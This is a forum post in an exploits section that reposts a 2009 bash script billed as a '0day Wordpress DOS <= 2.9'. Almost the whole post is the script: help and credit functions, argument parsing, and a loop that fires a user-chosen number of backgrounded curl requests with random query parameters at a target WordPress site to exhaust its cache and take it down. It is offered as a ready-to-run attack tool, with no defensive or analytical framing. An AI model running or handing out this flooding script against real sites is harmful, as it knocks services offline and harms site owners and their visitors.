Jump to content
trxtxx

0day Wordpress DOS <= 2.9

By trxtxx, in Exploituri

Recommended Posts

trxtxx Newbie

trxtxx

Posted
Posted

#!/bin/bash

#

# Copyright © 2009 Emanuele Gentili < emgent@backtrack.it >

#

# This program is released under the terms of the GNU General Public License

# (GPL), which is distributed with this software in the file "COPYING".

# The GPL specifies the terms under which users may copy and use this software.

#

# WPd0s.sh

# This is a 0day DOS issue for Wordpress Core that use cache stressing with random

# parameter on multiple requests.

#

show_help(){

echo ""

echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"

echo ""

echo " --usage show the exploit Usage"

echo " --prereq show the exploit Prerequisites"

echo " --credits show the exploit Credits"

echo " --help show the Help"

echo ""

echo "Emanuele Gentili <emgent@backtrack.it>"

}

show_credits(){

echo ""

echo " Emanuele 'emgent' Gentili"

echo " http://www.backtrack.it/~emgent/"

echo " emgent @ backtrack.it"

echo ""

}

show_prereq(){

echo ""

echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"

echo ""

echo " Prerequeisites:"

echo " Bash (yeah because is cool.)"

echo " Curl"

echo ""

echo " Emanuele Gentili <emgent@backtrack.it>"

}

show_usage(){

echo ""

echo " 2009 © WPd0s.sh - 0day Wordpress DOS <= 2.9"

echo ""

echo " usage $0 --host http://localhost/wordpress/ --requests 1000"

echo ""

echo " Emanuele Gentili <emgent@backtrack.it>"

}

# Bash

while [[ $# != 0 ]]; do

arg_name=$1; shift

case "$arg_name" in

--help|-?|-h) show_help; exit 0;;

--credits) show_credits; exit 0;;

--usage) show_usage; exit 0;;

--prereq) show_prereq; exit 0;;

--host) host=$1; shift;;

--requests) requests=$1; shift;;

*) echo "invalid option: $1"; show_help;exit 1;;

esac

done

[ -z "$host" ] && { show_help; exit 1; }

for random in `seq 1 $requests`; do

curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &

done

# 2009-12-30 enJoy.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...